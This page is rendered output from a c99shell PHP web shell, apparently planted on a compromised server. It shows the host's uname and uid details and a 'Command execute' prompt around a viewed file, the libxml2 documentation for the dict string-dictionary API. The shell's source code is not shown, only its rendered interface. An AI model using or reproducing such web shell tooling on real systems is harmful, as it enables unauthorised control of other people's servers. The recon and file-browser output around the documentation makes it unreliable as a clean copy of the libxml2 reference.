Software: Apache. PHP/7.3.33 uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) Safe-mode: OFF (not secure) /opt/cpanel/ea-libxml2/share/gtk-doc/html/libxml2/ drwxr-xr-x |
Viewing file: Select action/file-type:
dictdict - string dictionary dictionary of reusable strings, just used to avoid allocation and freeing operations. Author(s): Daniel Veillard Synopsistypedef struct _xmlDict xmlDict; typedef xmlDict * xmlDictPtr; void xmlDictCleanup (void); xmlDictPtr xmlDictCreate (void); xmlDictPtr xmlDictCreateSub (xmlDictPtr sub); const xmlChar * xmlDictExists (xmlDictPtr dict, DescriptionDetailsStructure xmlDictstruct _xmlDict { The content of this structure is not made public by the API. } xmlDict; xmlDictCleanup ()void xmlDictCleanup (void) DEPRECATED: This function is a no-op. Call xmlCleanupParser to free global state but see the warnings there. xmlCleanupParser should be only called once at program exit. In most cases, you don't have call cleanup functions at all. xmlDictCreate ()xmlDictPtr xmlDictCreate (void) Create a new dictionary
xmlDictCreateSub ()xmlDictPtr xmlDictCreateSub (xmlDictPtr sub) Create a new dictionary, inheriting strings from the read-only dictionary @sub. On lookup, strings are first searched in the new dictionary, then in @sub, and if not found are created in the new dictionary.
xmlDictExists ()const xmlChar * xmlDictExists (xmlDictPtr dict, Check if a string exists in the dictionary.
xmlDictFree ()void xmlDictFree (xmlDictPtr dict) Free the hash @dict and its contents. The userdata is deallocated with @f if provided.
xmlDictGetUsage ()size_t xmlDictGetUsage (xmlDictPtr dict) Get how much memory is used by a dictionary for strings Added in 2.9.0
xmlDictLookup ()const xmlChar * xmlDictLookup (xmlDictPtr dict, Lookup a string and add it to the dictionary if it wasn't found.
xmlDictOwns ()int xmlDictOwns (xmlDictPtr dict, check if a string is owned by the dictionary
xmlDictQLookup ()const xmlChar * xmlDictQLookup (xmlDictPtr dict, Lookup the QName @prefix:@name and add it to the dictionary if it wasn't found.
xmlDictReference ()int xmlDictReference (xmlDictPtr dict) Increment the reference counter of a dictionary
xmlDictSetLimit ()size_t xmlDictSetLimit (xmlDictPtr dict, Set a size limit for the dictionary Added in 2.9.0
xmlDictSize ()int xmlDictSize (xmlDictPtr dict) Query the number of elements installed in the hash @dict.
|
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0041 ]-- |